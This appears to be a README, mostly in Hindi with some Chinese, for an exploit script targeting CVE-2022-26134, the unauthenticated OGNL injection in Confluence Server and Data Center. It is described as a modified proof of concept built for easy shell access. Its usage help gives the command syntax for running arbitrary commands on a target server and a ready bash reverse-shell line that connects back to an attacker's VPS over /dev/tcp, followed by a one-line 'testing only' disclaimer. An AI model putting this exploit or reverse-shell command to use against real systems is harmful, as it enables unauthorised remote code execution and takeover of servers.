
दूरस्थ हमलावर, Confluence में बिना प्रमाणीकरण के, OGNL अभिव्यक्ति इंजेक्ट कर सकता है, जिससे Confluence Server या Data Center पर मनमाना कोड निष्पादित किया जा सकता है। मौजूदा स्क्रिप्ट में poc को संशोधित किया गया है, जिससे getshell आसान हो जाता है।
दूरस्थ हमलावर प्रमाणीकरण के बिना OGNL अभिव्यक्ति इंजेक्शन का निर्माण कर सकता है, Confluence Server या Data Center पर मनमाना कोड निष्पादित कर सकता है, poc को संशोधित करके getshell प्राप्त करना आसान बनाता है। सामान्य पोर्ट: 8090
pip3 install requests
______ _______ ____ ___ ____ ____ ____ __ _ _____ _ _
/ ___\ \ / | ____| |___ \ / _ |___ \|___ \ |___ \ / /_ / |___ /| || |
| | \ \ / /| _| _____ __) | | | |__) | __) _____ __) | '_ \| | |_ \| || |_
| |___ \ V / | |__|_____/ __/| |_| / __/ / __|_____/ __/| (_) | |___) |__ _|
\____| \_/ |_____| |_____|\___|_____|_____| |_____|\___/|_|____/ |_|
usage: CVE-2022-26134.py [-h] -t TARGET -c COMMAND
CVE-2022-26134
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
目标URL
-c COMMAND, --command COMMAND
执行命令(execute command),get shell:/bin/bash -c bash -i >& /dev/tcp/{vps ip}/{vps port} 0>&1
python3 CVE-2022-26134.py -t [server ip] -c [command] //执行命令
यह स्क्रिप्ट केवल परीक्षण के लिए उपयोग की जा सकती है, इसका अन्य उपयोग न करें।